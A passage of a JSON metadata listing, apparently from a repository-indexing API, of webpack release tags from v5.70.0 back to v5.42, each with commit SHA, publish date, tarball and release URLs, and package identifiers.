,{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/